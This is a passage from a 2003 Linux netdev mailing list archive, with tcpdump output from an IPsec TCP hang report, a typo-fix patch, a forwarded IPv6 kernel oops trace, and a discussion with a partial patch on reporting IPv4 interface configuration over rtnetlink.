192.168.0.3: ESP(spi=0x0c59bc9d,seq=0x2) (DF) (ttl 64, id 5517, len 1496) 19:55:26.128401 192.168.0.3 > 192.168.0.1: ESP(spi=0x039c0c62,seq=0x2) (DF) (ttl 64, id 34224, len 72) 19:55:26.128276 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0x3) (DF) (ttl 64, id 5518, len 1496) 19:55:26.128657 192.168.0.3 > 192.168.0.1: ESP(spi=0x039c0c62,seq=0x3) (DF) (ttl 64, id 34225, len 72) 19:55:26.128423 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0x4) (DF) (ttl 64, id 5519, len 1496) 19:55:26.128925 192.168.0.3 > 192.168.0.1: ESP(spi=0x039c0c62,seq=0x4) (DF) (ttl 64, id 34226, len 72) 19:55:26.128844 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0x5) (DF) (ttl 64, id 5520, len 1496) 19:55:26.129219 192.168.0.3 > 192.168.0.1: ESP(spi=0x039c0c62,seq=0x5) (DF) (ttl 64, id 34227, len 72) 19:55:26.128982 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0x6) (DF) (ttl 64, id 5521, len 1496) 19:55:26.129507 192.168.0.3 > 192.168.0.1: ESP(spi=0x039c0c62,seq=0x6) (DF) (ttl 64, id 34228, len 72) 19:55:26.129157 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0x7) (DF) (ttl 64, id 5522, len 1496) 19:55:26.129772 192.168.0.3 > 192.168.0.1: ESP(spi=0x039c0c62,seq=0x7) (DF) (ttl 64, id 34229, len 72) 19:55:26.129304 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0x8) (DF) (ttl 64, id 5523, len 1496) 19:55:26.130060 192.168.0.3 > 192.168.0.1: ESP(spi=0x039c0c62,seq=0x8) (DF) (ttl 64, id 34230, len 72) 19:55:26.129477 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0x9) (DF) (ttl 64, id 5524, len 1496) 19:55:26.130349 192.168.0.3 > 192.168.0.1: ESP(spi=0x039c0c62,seq=0x9) (DF) (ttl 64, id 34231, len 72) 19:55:26.129629 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0xa) (DF) (ttl 64, id 5525, len 1496) 19:55:26.130615 192.168.0.3 > 192.168.0.1: ESP(spi=0x039c0c62,seq=0xa) (DF) (ttl 64, id 34232, len 72) 19:55:26.129807 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0xb) (DF) (ttl 64, id 5526, len 1496) 19:55:26.130898 192.168.0.3 > 192.168.0.1: ESP(spi=0x039c0c62,seq=0xb) (DF) (ttl 64, id 34233, len 72) 19:55:26.129963 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0xc) (DF) (ttl 64, id 5527, len 1496) 19:55:26.131256 192.168.0.3 > 192.168.0.1: ESP(spi=0x039c0c62,seq=0xc) (DF) (ttl 64, id 34234, len 72) 19:55:26.130140 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0xd) (DF) (ttl 64, id 5528, len 1496) 19:55:26.131570 192.168.0.3 > 192.168.0.1: ESP(spi=0x039c0c62,seq=0xd) (DF) (ttl 64, id 34235, len 72) 19:55:26.130288 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0xe) (DF) (ttl 64, id 5529, len 1496) 19:55:26.131875 192.168.0.3 > 192.168.0.1: ESP(spi=0x039c0c62,seq=0xe) (DF) (ttl 64, id 34236, len 72) 19:55:26.130503 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0xf) (DF) (ttl 64, id 5530, len 1496) 19:55:26.132186 192.168.0.3 > 192.168.0.1: ESP(spi=0x039c0c62,seq=0xf) (DF) (ttl 64, id 34237, len 72) 19:55:26.130648 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0x10) (DF) (ttl 64, id 5531, len 1496) 19:55:26.132578 192.168.0.3 > 192.168.0.1: ESP(spi=0x039c0c62,seq=0x10) (DF) (ttl 64, id 34238, len 72) 19:55:26.130815 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0x11) (DF) (ttl 64, id 5532, len 1496) 19:55:26.130969 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0x12) (DF) (ttl 64, id 5533, len 1496) 19:55:26.131137 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0x13) (DF) (ttl 64, id 5534, len 1496) 19:55:26.131292 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0x14) (DF) (ttl 64, id 5535, len 1496) 19:55:26.131452 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0x15) (DF) (ttl 64, id 5536, len 1496) 19:55:26.131624 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0x16) (DF) (ttl 64, id 5537, len 1496) 19:55:26.131780 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0x17) (DF) (ttl 64, id 5538, len 1496) 19:55:26.131935 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0x18) (DF) (ttl 64, id 5539, len 1496) 19:55:26.132089 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0x19) (DF) (ttl 64, id 5540, len 1496) 19:55:26.132241 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0x1a) (DF) (ttl 64, id 5541, len 1496) 19:55:26.132429 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0x1b) (DF) (ttl 64, id 5542, len 1496) 19:55:26.132562 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0x1c) (DF) (ttl 64, id 5543, len 1496) 19:55:26.132727 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0x1d) (DF) (ttl 64, id 5544, len 1496) 19:55:26.132878 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0x1e) (DF) (ttl 64, id 5545, len 1496) 19:55:26.133034 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0x1f) (DF) (ttl 64, id 5546, len 1496) 19:55:26.133183 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0x20) (DF) (ttl 64, id 5547, len 1496) 19:55:26.133336 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0x21) (DF) (ttl 64, id 5548, len 1496) 19:55:26.137285 192.168.0.3 > 192.168.0.1: ESP(spi=0x039c0c62,seq=0x11) (DF) (ttl 64, id 34239, len 72) 19:55:26.137532 192.168.0.3 > 192.168.0.1: ESP(spi=0x039c0c62,seq=0x12) (DF) (ttl 64, id 34240, len 72) From sneakums@zork.net Sun Jul 20 12:47:26 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 20 Jul 2003 12:47:32 -0700 (PDT) Received: from zork.zork.net (mail@zork.zork.net [64.81.246.102]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6KJlPFl006326 for ; Sun, 20 Jul 2003 12:47:26 -0700 Received: from sneakums by zork.zork.net with local (Exim 3.35 #1 (Debian)) id 19eK9N-00055k-00; Sun, 20 Jul 2003 12:47:17 -0700 To: James Morris Cc: netdev@oss.sgi.com, Subject: Re: [2.6.0-test1-mm1] TCP connections over ipsec hang after a few seconds References: <6uwued6lzv.fsf@zork.zork.net> From: Sean Neakums Mail-Followup-To: James Morris , netdev@oss.sgi.com, Date: Sun, 20 Jul 2003 20:47:17 +0100 In-Reply-To: <6uwued6lzv.fsf@zork.zork.net> (Sean Neakums's message of "Sun, 20 Jul 2003 20:23:16 +0100") Message-ID: <6usmp16kvu.fsf@zork.zork.net> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-archive-position: 4192 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: sneakums@zork.net Precedence: bulk X-list: netdev Sean Neakums writes: > I ended up with about forty megabytes of tcpdump output on each side > of the link before the hang occurred. I've appended below the last > 150 lines of each dump. Four separate TCP connections were involved > in all, for a total of about 400MiB of data transferred. That is to say: the tree of files I was rsyncing is about 125MiB, and I deleted the destination tree and repeated the transfer until I reproduced the hang. From sneakums@zork.net Sun Jul 20 14:20:27 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 20 Jul 2003 14:20:35 -0700 (PDT) Received: from zork.zork.net (mail@zork.zork.net [64.81.246.102]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6KLKQFl015370 for ; Sun, 20 Jul 2003 14:20:26 -0700 Received: from sneakums by zork.zork.net with local (Exim 3.35 #1 (Debian)) id 19eLbW-0002Wa-00; Sun, 20 Jul 2003 14:20:26 -0700 To: netdev@oss.sgi.com Subject: [PATCH] correct 'discvovery' typo From: Sean Neakums Mail-Followup-To: netdev@oss.sgi.com Date: Sun, 20 Jul 2003 22:20:26 +0100 Message-ID: <6ubrvo7v51.fsf@zork.zork.net> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-archive-position: 4193 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: sneakums@zork.net Precedence: bulk X-list: netdev Against 2.6.0-test1. diff --exclude '*~' -urN T1/net/ipv4/ah4.c T1.edit/net/ipv4/ah4.c --- T1/net/ipv4/ah4.c 2003-07-14 04:37:32.000000000 +0100 +++ T1.edit/net/ipv4/ah4.c 2003-07-20 22:11:23.000000000 +0100 @@ -232,7 +232,7 @@ x = xfrm_state_lookup((xfrm_address_t *)&iph->daddr, ah->spi, IPPROTO_AH, AF_INET); if (!x) return; - printk(KERN_DEBUG "pmtu discvovery on SA AH/%08x/%08x\n", + printk(KERN_DEBUG "pmtu discovery on SA AH/%08x/%08x\n", ntohl(ah->spi), ntohl(iph->daddr)); xfrm_state_put(x); } diff --exclude '*~' -urN T1/net/ipv4/esp4.c T1.edit/net/ipv4/esp4.c --- T1/net/ipv4/esp4.c 2003-07-14 04:34:43.000000000 +0100 +++ T1.edit/net/ipv4/esp4.c 2003-07-20 22:11:18.000000000 +0100 @@ -425,7 +425,7 @@ x = xfrm_state_lookup((xfrm_address_t *)&iph->daddr, esph->spi, IPPROTO_ESP, AF_INET); if (!x) return; - printk(KERN_DEBUG "pmtu discvovery on SA ESP/%08x/%08x\n", + printk(KERN_DEBUG "pmtu discovery on SA ESP/%08x/%08x\n", ntohl(esph->spi), ntohl(iph->daddr)); xfrm_state_put(x); } diff --exclude '*~' -urN T1/net/ipv4/ipcomp.c T1.edit/net/ipv4/ipcomp.c --- T1/net/ipv4/ipcomp.c 2003-07-14 04:37:28.000000000 +0100 +++ T1.edit/net/ipv4/ipcomp.c 2003-07-20 22:11:21.000000000 +0100 @@ -256,7 +256,7 @@ spi, IPPROTO_COMP, AF_INET); if (!x) return; - printk(KERN_DEBUG "pmtu discvovery on SA IPCOMP/%08x/%u.%u.%u.%u\n", + printk(KERN_DEBUG "pmtu discovery on SA IPCOMP/%08x/%u.%u.%u.%u\n", spi, NIPQUAD(iph->daddr)); xfrm_state_put(x); } diff --exclude '*~' -urN T1/net/ipv6/ah6.c T1.edit/net/ipv6/ah6.c --- T1/net/ipv6/ah6.c 2003-07-14 04:36:31.000000000 +0100 +++ T1.edit/net/ipv6/ah6.c 2003-07-20 22:11:30.000000000 +0100 @@ -364,7 +364,7 @@ if (!x) return; - printk(KERN_DEBUG "pmtu discvovery on SA AH/%08x/" + printk(KERN_DEBUG "pmtu discovery on SA AH/%08x/" "%04x:%04x:%04x:%04x:%04x:%04x:%04x:%04x\n", ntohl(ah->spi), NIP6(iph->daddr)); diff --exclude '*~' -urN T1/net/ipv6/esp6.c T1.edit/net/ipv6/esp6.c --- T1/net/ipv6/esp6.c 2003-07-14 04:35:16.000000000 +0100 +++ T1.edit/net/ipv6/esp6.c 2003-07-20 22:11:28.000000000 +0100 @@ -317,7 +317,7 @@ x = xfrm_state_lookup((xfrm_address_t *)&iph->daddr, esph->spi, IPPROTO_ESP, AF_INET6); if (!x) return; - printk(KERN_DEBUG "pmtu discvovery on SA ESP/%08x/" + printk(KERN_DEBUG "pmtu discovery on SA ESP/%08x/" "%04x:%04x:%04x:%04x:%04x:%04x:%04x:%04x\n", ntohl(esph->spi), NIP6(iph->daddr)); xfrm_state_put(x); diff --exclude '*~' -urN T1/net/ipv6/ipcomp6.c T1.edit/net/ipv6/ipcomp6.c --- T1/net/ipv6/ipcomp6.c 2003-07-14 04:34:31.000000000 +0100 +++ T1.edit/net/ipv6/ipcomp6.c 2003-07-20 22:11:25.000000000 +0100 @@ -248,7 +248,7 @@ if (!x) return; - printk(KERN_DEBUG "pmtu discvovery on SA IPCOMP/%08x/" + printk(KERN_DEBUG "pmtu discovery on SA IPCOMP/%08x/" "%04x:%04x:%04x:%04x:%04x:%04x:%04x:%04x\n", spi, NIP6(iph->daddr)); xfrm_state_put(x); From jmorris@intercode.com.au Sun Jul 20 17:28:24 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 20 Jul 2003 17:28:31 -0700 (PDT) Received: from blackbird.intercode.com.au (IDENT:3VTGEz5mrUpMmXdmoRKoyjufquq16ML7@blackbird.intercode.com.au [203.32.101.10]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6L0SLFl023447 for ; Sun, 20 Jul 2003 17:28:22 -0700 Received: from excalibur.intercode.com.au (excalibur.intercode.com.au [203.32.101.12]) by blackbird.intercode.com.au (8.11.6p2/8.9.3) with ESMTP id h6L0S9r15427; Mon, 21 Jul 2003 10:28:10 +1000 Date: Mon, 21 Jul 2003 10:28:09 +1000 (EST) From: James Morris To: Sean Neakums cc: netdev@oss.sgi.com, Subject: Re: [2.6.0-test1-mm1] TCP connections over ipsec hang after a few seconds In-Reply-To: <6uwued6lzv.fsf@zork.zork.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 4194 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jmorris@intercode.com.au Precedence: bulk X-list: netdev On Sun, 20 Jul 2003, Sean Neakums wrote: > > With the 100baseT configuration, are the systems on the same segment? > > I'm connecting the two machines with a crossed-over cable. I can't see anything strange here. Can you confirm that you are seeing the pmtu messages for the crossover cable case? If not, perhaps try manual configuration to rule out any racoon issues. - James -- James Morris From jmorris@intercode.com.au Sun Jul 20 17:35:57 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 20 Jul 2003 17:36:01 -0700 (PDT) Received: from blackbird.intercode.com.au (IDENT:JuykiGJ5K9pLF8PY7C5sedkYn4XJAL4k@blackbird.intercode.com.au [203.32.101.10]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6L0ZsFl024106 for ; Sun, 20 Jul 2003 17:35:55 -0700 Received: from excalibur.intercode.com.au (excalibur.intercode.com.au [203.32.101.12]) by blackbird.intercode.com.au (8.11.6p2/8.9.3) with ESMTP id h6L0Zrr15489 for ; Mon, 21 Jul 2003 10:35:53 +1000 Date: Mon, 21 Jul 2003 10:35:52 +1000 (EST) From: James Morris To: netdev@oss.sgi.com Subject: [IPV6 Problem in 2.6.0-test1] Unable to handle kernel paging request at virtual address 6b6b6b6b (fwd) Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 4195 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jmorris@intercode.com.au Precedence: bulk X-list: netdev ---------- Forwarded message ---------- Date: 20 Jul 2003 20:09:51 -0400 From: Trever L. Adams To: Linux Kernel Mailing List Subject: [IPV6 Problem in 2.6.0-test1] Unable to handle kernel paging request at virtual address 6b6b6b6b Jul 20 20:06:42 aurora kernel: Unable to handle kernel paging request at virtual address 6b6b6b6b Jul 20 20:06:42 aurora kernel: printing eip: Jul 20 20:06:42 aurora kernel: 6b6b6b6b Jul 20 20:06:42 aurora kernel: *pde = 00000000 Jul 20 20:06:42 aurora kernel: Oops: 0000 [#1] Jul 20 20:06:42 aurora kernel: CPU: 0 Jul 20 20:06:42 aurora kernel: EIP: 0060:[<6b6b6b6b>] Not tainted Jul 20 20:06:42 aurora kernel: EFLAGS: 00010286 Jul 20 20:06:42 aurora kernel: EIP is at 0x6b6b6b6b Jul 20 20:06:42 aurora kernel: eax: dca4c084 ebx: dc95ccbc ecx: dd178104 edx: cd94db40 Jul 20 20:06:42 aurora kernel: esi: dc95ccbc edi: 00000000 ebp: 00000000 esp: c3aa7cac Jul 20 20:06:42 aurora kernel: ds: 007b es: 007b ss: 0068 Jul 20 20:06:42 aurora kernel: Process ogg123 (pid: 4504, threadinfo=c3aa6000 task=cd236080) Jul 20 20:06:42 aurora kernel: Stack: e0984a96 dc95ccbc 00000000 00000000 c3aa7d90 cd9772a4 00000000 00000000 Jul 20 20:06:42 aurora kernel: 000005dc dc95ccbc 00000000 00000028 e0984ed1 dc95ccbc c3aa7d50 00000010 Jul 20 20:06:42 aurora kernel: 00000000 cf88e084 df7683fc 4122c000 00000001 00000001 cd236080 dc68c60c Jul 20 20:06:42 aurora kernel: Call Trace: Jul 20 20:06:42 aurora kernel: [] ip6_output2+0x166/0x240 [ipv6] Jul 20 20:06:42 aurora kernel: [] ip6_xmit+0x1f1/0x370 [ipv6] Jul 20 20:06:42 aurora kernel: [] tcp_v6_xmit+0x116/0x230 [ipv6] Jul 20 20:06:42 aurora kernel: [] tcp_transmit_skb+0x39f/0x5a0 Jul 20 20:06:42 aurora kernel: [] tcp_connect+0x3a1/0x470 Jul 20 20:06:42 aurora kernel: [] tcp_v6_connect+0x397/0x750 [ipv6] Jul 20 20:06:42 aurora kernel: [] inet_stream_connect+0xe8/0x210 Jul 20 20:06:42 aurora kernel: [] sys_connect+0x9b/0xd0 Jul 20 20:06:42 aurora kernel: [] sock_map_fd+0xfa/0x130 Jul 20 20:06:42 aurora kernel: [] sock_create+0x10b/0x170 Jul 20 20:06:42 aurora kernel: [] sys_socket+0x3d/0x60 Jul 20 20:06:42 aurora kernel: [] sys_socketcall+0xcd/0x2a0 Jul 20 20:06:42 aurora kernel: [] do_fcntl+0xb5/0x1a0 Jul 20 20:06:42 aurora kernel: [] sys_fcntl64+0x79/0xc0 Jul 20 20:06:43 aurora kernel: [] sysenter_past_esp+0x52/0x71 Jul 20 20:06:43 aurora kernel: Jul 20 20:06:43 aurora kernel: Code: Bad EIP value. System is nVideo nForce 2 based motherboard running a mostly RedHat Rawhide (up to date) with 2.6.0-test rpms by arjanv at RedHat. Trever -- "Having Microsoft give us advice on open standards is like W.C. Fields giving moral advice to the Mormon Tabernacle Choir" -- Scott McNealy, Sun Microsystems Inc. - To unsubscribe from this list: send the line "unsubscribe linux-kernel" in the body of a message to majordomo@vger.kernel.org More majordomo info at http://vger.kernel.org/majordomo-info.html Please read the FAQ at http://www.tux.org/lkml/ From sneakums@zork.net Sun Jul 20 17:37:11 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 20 Jul 2003 17:37:16 -0700 (PDT) Received: from zork.zork.net (mail@zork.zork.net [64.81.246.102]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6L0bAFl024432 for ; Sun, 20 Jul 2003 17:37:11 -0700 Received: from sneakums by zork.zork.net with local (Exim 3.35 #1 (Debian)) id 19eOfp-0004Y4-00; Sun, 20 Jul 2003 17:37:05 -0700 To: James Morris Cc: netdev@oss.sgi.com, Subject: Re: [2.6.0-test1-mm1] TCP connections over ipsec hang after a few seconds References: From: Sean Neakums Mail-Followup-To: James Morris , netdev@oss.sgi.com, Date: Mon, 21 Jul 2003 01:37:05 +0100 In-Reply-To: (James Morris's message of "Mon, 21 Jul 2003 10:28:09 +1000 (EST)") Message-ID: <6uu19g67gu.fsf@zork.zork.net> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-archive-position: 4196 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: sneakums@zork.net Precedence: bulk X-list: netdev James Morris writes: > On Sun, 20 Jul 2003, Sean Neakums wrote: > >> > With the 100baseT configuration, are the systems on the same segment? >> >> I'm connecting the two machines with a crossed-over cable. > > I can't see anything strange here. Can you confirm that you are seeing > the pmtu messages for the crossover cable case? If not, perhaps try > manual configuration to rule out any racoon issues. Yes. I checked the logs after I did the recreation, and the pmtu messages are definitely showing up in the crossover case. Will retry with manual config. From kuznet@ms2.inr.ac.ru Sun Jul 20 17:50:21 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 20 Jul 2003 17:50:29 -0700 (PDT) Received: from dub.inr.ac.ru (dub.inr.ac.ru [193.233.7.105]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6L0oJFl025247 for ; Sun, 20 Jul 2003 17:50:20 -0700 Received: (from kuznet@localhost) by dub.inr.ac.ru (8.6.13/ANK) id EAA31237; Mon, 21 Jul 2003 04:49:56 +0400 From: kuznet@ms2.inr.ac.ru Message-Id: <200307210049.EAA31237@dub.inr.ac.ru> Subject: Re: [PATCH 2/2] Prefix List and O/M flags against 2.5.73 To: yoshfuji@linux-ipv6.org (YOSHIFUJIHideaki/=?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?=) Date: Mon, 21 Jul 2003 04:49:55 +0400 (MSD) Cc: krkumar@us.ibm.com, davem@redhat.com, netdev@oss.sgi.com, linux-net@vger.kernel.org In-Reply-To: <20030719.093316.45294671.yoshfuji@linux-ipv6.org> from "YOSHIFUJIHideaki/=?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?=" at Jul 19, 2003 09:33:16 AM X-Mailer: ELM [version 2.5 PL6] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 4197 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: kuznet@ms2.inr.ac.ru Precedence: bulk X-list: netdev Hello! > First part (prefixlist) seems ok to me. The same is here. It looks good. > Second part does not. I do not like the latest version a lot. :-) Actually, previous one was quite acceptable, but I think Yoshfuji's suggestion is so good that it makes lots of sense to complete it. I could make this in IPv4 part, actually, I started to make it as demo for Krishna, but two questions remained unaswered: 1. How to allocate new attributes? It is bad just to add them to existing IFLA_* ones or override them. I would suggest to create new attribute IFLA_PROTINFO and to embed new protocol dependant attributes as subattributes a la RTA_METRICS. Another suggestions? 2. IFLA_INET6_CONF (and IFLA_INET_CONF). How to encode the values? Array of int's is simple, compact and looks good. But I have some problem with it. What if one day we want to implement changing the values? It will be nasty. To forget about such perspective? Or to leave it to use for "atomic" load of all the parameters? Alexey From jmorris@intercode.com.au Sun Jul 20 18:02:44 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 20 Jul 2003 18:02:50 -0700 (PDT) Received: from blackbird.intercode.com.au (IDENT:3f75iEePdAAYnJaYIP6M0dAnkzC2j9O0@blackbird.intercode.com.au [203.32.101.10]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6L12fFl026090 for ; Sun, 20 Jul 2003 18:02:42 -0700 Received: from excalibur.intercode.com.au (excalibur.intercode.com.au [203.32.101.12]) by blackbird.intercode.com.au (8.11.6p2/8.9.3) with ESMTP id h6L12ar15602; Mon, 21 Jul 2003 11:02:36 +1000 Date: Mon, 21 Jul 2003 11:02:35 +1000 (EST) From: James Morris To: Sean Neakums cc: netdev@oss.sgi.com Subject: Re: [PATCH] correct 'discvovery' typo In-Reply-To: <6ubrvo7v51.fsf@zork.zork.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 4198 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jmorris@intercode.com.au Precedence: bulk X-list: netdev On Sun, 20 Jul 2003, Sean Neakums wrote: > Against 2.6.0-test1. Applied to bk://kernel.bkbits.net/jmorris/net-2.5 -- James Morris From kuznet@ms2.inr.ac.ru Sun Jul 20 18:55:22 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 20 Jul 2003 18:55:32 -0700 (PDT) Received: from dub.inr.ac.ru (dub.inr.ac.ru [193.233.7.105]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6L1tKFl028808 for ; Sun, 20 Jul 2003 18:55:21 -0700 Received: (from kuznet@localhost) by dub.inr.ac.ru (8.6.13/ANK) id FAA31320; Mon, 21 Jul 2003 05:55:05 +0400 From: kuznet@ms2.inr.ac.ru Message-Id: <200307210155.FAA31320@dub.inr.ac.ru> Subject: Re: [PATCH 2/2] Prefix List and O/M flags against 2.4.21 To: krkumar@us.ibm.com (Krishna Kumar) Date: Mon, 21 Jul 2003 05:55:04 +0400 (MSD) Cc: yoshfuji@linux-ipv6.org, krkumar@us.ibm.com, davem@redhat.com, netdev@oss.sgi.com, linux-net@vger.kernel.org In-Reply-To: <3F17245D.9040806@us.ibm.com> from "Krishna Kumar" at Jul 17, 2003 03:34:05 PM X-Mailer: ELM [version 2.5 PL6] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 4199 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: kuznet@ms2.inr.ac.ru Precedence: bulk X-list: netdev Hello! > I don't > have any knowledge of using this new interface. Something like this. See? I just substitute into xxx_rtnetlink_table() entry for RTM_GETLINK with IPv4 specific function which outputs the same message, but, maybe, with some attributes removed and with new protocol-specific attribute. The patch is not quite complete: except for those two questions, I forgot to add MTU truncated to its IPv4 value, did nothing for multicast things (I still cannot figure out, what information is really useful) and did not add active notifications which would be good to be made after sysctl parameters are changed. Alexey # This is a BitKeeper generated patch for the following project: # Project Name: Linux kernel tree # This patch format is intended for GNU patch command version 2.5 or higher. # This patch includes the following deltas: # ChangeSet 1.1469 -> 1.1470 # net/ipv4/devinet.c 1.19 -> 1.20 # include/linux/rtnetlink.h 1.18 -> 1.19 # # The following is the BitKeeper ChangeSet Log # -------------------------------------------- # 03/07/21 kuznet@oops.inr.ac.ru 1.1470 # Reporting INET config via rtnetlink # -------------------------------------------- # diff -Nru a/include/linux/rtnetlink.h b/include/linux/rtnetlink.h --- a/include/linux/rtnetlink.h Mon Jul 21 05:47:01 2003 +++ b/include/linux/rtnetlink.h Mon Jul 21 05:47:01 2003 @@ -476,10 +476,12 @@ #define IFLA_MASTER IFLA_MASTER IFLA_WIRELESS, /* Wireless Extension event - see wireless.h */ #define IFLA_WIRELESS IFLA_WIRELESS + IFLA_PROTINFO, +#define IFLA_PROTINFO IFLA_PROTINFO }; -#define IFLA_MAX IFLA_WIRELESS +#define IFLA_MAX IFLA_PROTINFO #define IFLA_RTA(r) ((struct rtattr*)(((char*)(r)) + NLMSG_ALIGN(sizeof(struct ifinfomsg)))) #define IFLA_PAYLOAD(n) NLMSG_PAYLOAD(n,sizeof(struct ifinfomsg)) @@ -512,6 +514,16 @@ or maybe 0, what means, that real media is unknown (usual for IPIP tunnels, when route to endpoint is allowed to change) */ + +enum +{ + IFLA_INET_UNSPEC, + IFLA_INET_CONF, /* sysctl parameters */ + IFLA_INET_NEIGH, /* ARP parameters */ + IFLA_INET_MCAST, /* MC things. What of them? */ +}; + +#define IFLA_INET_MAX IFLA_INET_CONF /***************************************************************** * Traffic control messages. diff -Nru a/net/ipv4/devinet.c b/net/ipv4/devinet.c --- a/net/ipv4/devinet.c Mon Jul 21 05:47:01 2003 +++ b/net/ipv4/devinet.c Mon Jul 21 05:47:01 2003 @@ -1008,17 +1008,88 @@ } } +static int inet_fill_ifinfo(struct sk_buff *skb, struct net_device *dev, + struct in_device *in_dev, + int type, u32 pid, u32 seq) +{ + struct ifinfomsg *r; + struct nlmsghdr *nlh; + unsigned char *b = skb->tail; + struct rtattr *subattr; + + nlh = NLMSG_PUT(skb, pid, seq, type, sizeof(*r)); + if (pid) nlh->nlmsg_flags |= NLM_F_MULTI; + r = NLMSG_DATA(nlh); + r->ifi_family = AF_INET; + r->ifi_type = dev->type; + r->ifi_index = dev->ifindex; + r->ifi_flags = dev->flags; + r->ifi_change = 0; + + if (!netif_running(dev) || !netif_carrier_ok(dev)) + r->ifi_flags &= ~IFF_RUNNING; + else + r->ifi_flags |= IFF_RUNNING; + + RTA_PUT(skb, IFLA_IFNAME, strlen(dev->name)+1, dev->name); + + /* Some more IFLA_* attribute fr convenience? IPv4-ized MTU + * would be good idea. + */ + + subattr = (struct rtattr*)skb->tail; + RTA_PUT(skb, IFLA_PROTINFO, 0, NULL); + RTA_PUT(skb, IFLA_INET_CONF, sizeof(int)*16, &in_dev->cnf); + RTA_PUT(skb, IFLA_INET_NEIGH, sizeof(int)*13, &in_dev->arp_parms->base_reachable_time); + subattr->rta_len = skb->tail - (u8*)subattr; + + nlh->nlmsg_len = skb->tail - b; + return skb->len; + +nlmsg_failure: +rtattr_failure: + skb_trim(skb, b - skb->data); + return -1; +} + + +int inet_dump_ifinfo(struct sk_buff *skb, struct netlink_callback *cb) +{ + int idx, err; + int s_idx = cb->args[0]; + struct net_device *dev; + struct in_device *in_dev; + + read_lock(&dev_base_lock); + for (dev=dev_base, idx=0; dev; 